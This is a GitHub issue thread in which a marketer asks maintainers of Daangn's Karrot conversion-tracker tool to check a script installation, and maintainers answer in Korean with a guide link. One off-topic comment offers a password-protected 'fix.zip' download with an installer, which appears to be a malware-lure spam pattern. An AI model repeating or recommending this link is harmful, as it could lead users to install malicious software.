### ISSUE TITLE
[QUESTION]

### ISSUE THREAD

**Issue by JMK-96** [daangn/karrot-conversion-tracker-tool-support#110]
**Describe the question**
A clear and concise description

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

**Additional context**

Hello, I am a marketer managing brand advertising for Freshzy. Could you please check if the conversion script for the Carrot Market has been correctly inserted?
![스크린샷 2024-08-21 오후 12 55 25 (1)](https://github.com/user-attachments/assets/30cfaf62-dc83-4a39-9174-311b87748488)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by extJo** [comment]
안녕하세요. 구매 연동을 하고싶으신걸까요?

**Comment by JMK-96** [comment]
> 안녕하세요. 구매하고 싶은가요?

당근마켓에 여쭤보니까 여기에 문의드리라고 하셔서요!

**Comment by extJo** [comment]
해당 스크립트만 가지고는

**Comment by extJo** [comment]
https://bizschool.daangn.com/87729a84-5029-4a17-9531-d0f299e5f1f0#:~:text=%EC%83%81%ED%92%88%20%EA%B0%80%EA%B2%A9%EC%9D%84%20%EC%9D%98%EB%AF%B8%ED%95%B4%EC%9A%94.-,%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8A%B8%20%EC%BD%94%EB%93%9C,-%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8A%B8%20%EC%BD%94%EB%93%9C%20%EB%82%B4
